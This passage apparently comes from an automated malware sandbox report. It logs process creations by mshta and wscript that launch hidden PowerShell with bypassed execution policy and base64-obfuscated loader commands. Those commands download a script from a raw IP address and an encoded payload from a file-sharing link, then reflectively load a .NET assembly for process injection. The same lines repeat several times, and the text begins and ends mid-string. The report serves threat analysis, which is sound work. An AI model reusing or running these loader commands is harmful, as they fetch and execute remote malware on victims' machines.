GJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"Jump to behavior
      Suspicious powershell command line found
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"Jump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"Jump to behavior
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ